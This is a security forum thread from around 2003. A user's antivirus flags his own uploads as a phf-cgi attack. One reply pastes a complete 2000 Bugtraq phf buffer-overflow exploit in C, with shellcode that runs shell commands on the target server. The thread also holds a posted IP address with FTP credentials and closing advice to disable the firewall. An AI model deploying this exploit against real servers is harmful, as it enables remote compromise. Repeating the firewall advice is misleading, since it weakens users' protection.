Results 1 to 6 of 6

Thread: phf-cgi

  1. #1
    Junior Member
    Join Date
    Dec 2003
    Posts
    3

    Exclamation phf-cgi

    I was chatting with some kid I met through a mutual friend about hacking and it was clear he knew way more about it all than I did. I asked him if he had any files or anything that would help me or anything. Something easy and light, because I unfortunately don't have much time to dedicate to the craft, but it still interests me. I was perusing his ftp site he gave me
    (24.220.237.221 user: krelic pw: password [or he said the user: anonymous would work without any password]). and I didn't really find anything and it looked like he was hosting a website there with a lot of forum code (nuke or something). While I was looking about for these "files" he was talking about I got an alert from my antivirus saying that I was attacked by his IP address with a Ripper trojan (or something). So I called him on it and asked if he was really gonna help me or not, and he put some actual files on there that actually looked pretty helpful. Then as I was trying to upload files to my angelfire website (to update it so people back home [I'm currently deployed] can see what's going on...) I keep getting denied because my computer is attacking angelfire's IP with a phf-cgi attack. I deleted all the files I got from him (two zip files I never opened, and a .chm help file that I did look through) and it hasn't solved the problem. I restarted my computer and am able to upload files for about 5 min before my computer starts attacking on it's own again. I've looked it all up Symantec and read all about it all over, but all it does is tell me what it is and not how to stop it. Can it be stopped? I know that people just coming straight here to get help annoys a lot of the elders of the community here, but I really did look all I could else where and turn to you. I even tried the hack3rs.com IRC channel but they didn't help. I really need to fix this by the end of the weekend because I'm going to be unable to get this stuff up for the next month if I can't finish it. Any help that anyone can give is much appreciated.
    Swift is the Phridum that comes for you...

  2. #2
    Google Yielded http://www.cgisecurity.com/archive/cgi/phf2a.html

    Message-ID: <3A1286E7.32BC4568@energymech.net>
    Date: Wed, 15 Nov 2000 13:51:51 +0100
    Reply-To: proton
    Sender: Bugtraq List
    From: proton
    Subject: Exploit: phf buffer overflow (CGI)
    To: BUGTRAQ@SECURITYFOCUS.COM
    Status: OR

    Funny how a program thats almost a decade old is still around
    to haunt us, isnt it?

    This should be a potent reminder for all CGI authors out there
    that these things can live forever.


    This exploit will give remote access on most (all?) Linux-ix86
    boxes (and freebsd?) with phf installed, patch or no patch,
    its vulnerable.

    There is only one remedy, remove it!

    If your mailer(s) trash the source below, you can also download
    it from http://www.energymech.net/users/proton/phx.c

    /proton


    //---- phx.c ----
    /*
    | phx.c -- phf buffer overflow exploit for Linux-ix86
    | Copyright (c) 2000 by proton. All rights reserved.
    |
    | This program is free software; you can redistribute it and/or modify
    | it under the terms of the GNU General Public License as published by
    | the Free Software Foundation; either version 2 of the License, or
    | (at your option) any later version.
    |
    | This program is distributed in the hope that it will be useful,
    | but WITHOUT ANY WARRANTY; without even the implied warranty of
    | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    | GNU General Public License for more details.
    */
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    char tmp[8192];
    char *host;
    char *progname;

    unsigned char shellcode[] =
    "GET
    /cgi-bin/phf?&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
    /*
    * 2 pointers, in case of -fomit-frame-pointer
    */
    "\x37\xfc\xff\xbf"
    "\x37\xfc\xff\xbf"
    " HTTP/1.0\n"
    /*
    * set environment var `HTTP_X'
    */
    "X: "
    /*
    * a bundle of AAA's, they're just as good as NOP's
    * but is a tad bit more readable to humans.
    * 512 no-op instructions gives us a nice phat
    * strike-zone for the above 2 pointers.
    */

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"

    "7777777777777777777777777777777777777777777777777777777777777777"
    /*
    * exploit code
    */

    "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"

    "\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"

    "\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

    "\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
    "\x41\x41"
    /*
    * try to make sense to the webserver
    */
    "/bin/sh -c echo 'Content-Type: text/plain';echo '';"
    /*
    * execute something funny!
    */
    "echo Hello! I am running as \\\"`whoami`\\\" on a `arch` cpu;"
    "echo Local time is `date` and there are `who|wc -l` users
    logged in.;"
    "echo '';"
    /*
    * shellcode will terminate command at the `@'
    */
    "@\n\n"
    ;

    void netpipe(int *rsock, int *wsock)
    {
    struct sockaddr_in sai;
    struct hostent *he;
    int s;

    if (!host || !*host)
    {
    printf("Usage: %s \n",progname);
    exit(1);
    }
    he = gethostbyname(host);
    if (!he)
    {
    printf("%s: Unknown host\n",host);
    exit(1);
    }

    s = socket(AF_INET,SOCK_STREAM,0);
    sai.sin_family = AF_INET;
    sai.sin_port = htons(80);
    memcpy(&sai.sin_addr,he->h_addr_list[0],sizeof(struct in_addr));

    if (connect(s,(struct sockaddr*)&sai,sizeof(sai)) < 0)
    {
    switch(errno)
    {
    case ECONNREFUSED:
    output("Connection refused.\n");
    break;
    case ETIMEDOUT:
    output("Connection timed out.\n");
    break;
    case ENETUNREACH:
    output("Network unreachable.\n");
    break;
    default:
    output("Unknown error.\n");
    break;
    }
    exit(1);
    }

    *rsock = *wsock = s;
    }

    int main(int argc, char **argv)
    {
    char *q,*cp;
    int in,out;
    int sz,x,n;

    progname = argv[0];
    host = argv[1];

    netpipe(&in,&out);

    write(out,shellcode,sizeof(shellcode));

    output("\nCome to papa!\n\n");

    n = x = 0;
    for(;
    {
    sz = read(in,&tmp[x],512-x);
    if (sz < 1)
    break;
    x += sz;
    q = cp = tmp;
    for(sz=x;sz
    {
    if (*q == '\n')
    {
    write(1,cp,(q-cp)+1);
    cp = q + 1;
    }
    q++;
    sz--;
    }
    if (cp != tmp)
    {
    sz = x - (cp - tmp);
    memcpy(tmp,cp,sz);
    x -= (cp - tmp);
    }
    }
    exit(0);
    }
    //---- end of file ----

  3. #3
    Macht Nicht Aus moxnix's Avatar
    Join Date
    May 2002
    Location
    Huson Mt.
    Posts
    1,752
    The Cleaner by Moosoft also handles most trojans very well. It has an evaluation period you can use it for free, but you also might want to buy it if you keep going to sites like you did or fooling with the scriptkiddies as you seem to. You will need it frequently. http://www.moosoft.com/products/cleaner/

    I suggest you get a good firewall, and updated AV also. (search the site for the better firewalls and AV engines)
    \"Life should NOT be a journey to the grave with the intention of arriving safely in an attractive and well preserved body, but rather to skid in sideways, Champagne in one hand - strawberries in the other, body thoroughly used up, totally worn out and screaming WOO HOO - What a Ride!\"
    Author Unknown

  4. #4
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    I won't preach....honest.....

    If you are going to experiment with malware and visit the "darkside" of the web, please get yourself an old 486/PI or whatever......you should be able to get one for free or next to nothing.

    Don't use your main machine
    Don't use a shared machine
    Don't use a machine that you don't own (legally )
    Don't use a machine on a network

    Burn all OS fixes/patches onto a CD because you will be reformatting and re-installing a lot

    Good luck

  5. #5
    Junior Member
    Join Date
    Dec 2003
    Posts
    3
    I already use Norton AntiVirus and Internet Security. I'm running XP and all the help I've been getting is for Linux and stuff. I'll try the Moosoft, but some how, I don't really think it's a typical trojan...but really, don't know anything about anything, so we'll see. Thanks for the help.
    Swift is the Phridum that comes for you...

  6. #6
    Junior Member
    Join Date
    Dec 2003
    Posts
    3
    Alright, this makes me look pretty stupid, but because I really don't know all that much about all this stuff I'll swallow my pride and let you know...I wondered if I would be able to upload all my files if Norton didn't stop me from just performing the "attack". I disabled Norton and it all went smoothly. So I think what was really happening was what usually happens but because of the specific code that was going between me and Angelfire's upload utility, Norton just saw it as the typical "phf-cgi" attack. But it wasn't...so if this same thing is happening to you, just disable the firewall for the moment and proceed with the upload. Thanks for all the help and sorry for wasting your time. (Kinda wish I still had those help files I had gotten from that kid, though...)
    Swift is the Phridum that comes for you...

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •